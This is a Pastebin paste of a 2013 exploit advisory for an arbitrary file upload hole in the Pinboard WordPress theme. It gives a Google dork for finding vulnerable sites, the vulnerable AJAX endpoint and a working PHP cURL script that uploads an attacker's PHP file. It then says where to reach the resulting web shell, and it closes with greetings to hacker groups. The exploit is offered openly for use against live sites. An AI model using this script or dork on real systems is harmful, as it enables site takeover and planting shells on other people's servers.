Googleinurl

Exploit Title : Wordpress Themes Pinboard Arbitrary File Upl

Nov 26th, 2013
1,300
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Exploit Title : Wordpress Themes Pinboard Arbitrary File Upload Vulnerability
  2. #Author : ReC0ded
  3. #Vendor : http://themify.me/
  4. #Download : http://themify.me/themes/Pinboard
  5. #Date : 22, November 2013.
  6. #Type : php, html, htm, asp, etc.
  7. #Category : Web Applications
  8. #Vulnerability : File Upload
  9. #Tested On : Windows 7 32-bit | Google Chrome
  10.  
  11. #Dork : inurl:/wp-content/themes/pinboard/ | USE YOUR BRAIN =))
  12.  
  13. #Exploit : http://victim/[PATH]/wp-content/themes/pinboard/themify/themify-ajax.php
  14.  
  15. #POC :
  16.  
  17. <?php
  18. $uploadfile="ReC0ded.php";
  19. $ch = curl_init("http://victim/[PATH]/wp-content/themes/pinboard/themify/themify-ajax.php?upload=1");
  20. curl_setopt($ch, CURLOPT_POST, true);
  21. curl_setopt($ch, CURLOPT_POSTFIELDS,
  22. array('Filedata'=>"@$uploadfile"));
  23. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  24. $postResult = curl_exec($ch);
  25. curl_close($ch);
  26. print "$postResult";
  27. ?>
  28.  
  29. #Results See Your Shell On : http://victim/[PATH]/wp-content/themes/pinboard/uploads/{YOUR_FILE}.php
  30.  
  31. #################### Say Yes ####################
  32. $Greetz To : ./Newbie-Security ./Malang Cyber Crew ./Hacker Newbie ./Binus Hacker ./Indonesian Cyber Army ./Indonesian Security Down ./Indonesian Figther Cyber ./Devilzc0de ./Surabaya Blackhat
  33. $Thanks To : ./All Member Newbie-Security Team We Loved ./DevilScreaM ./ShadoWNamE ./grub_err0r ./R3dh34d ./ice-cream ./win32conficker ./HMBP-02 ./Mr.Alf1anz ./casper
RAW Paste Data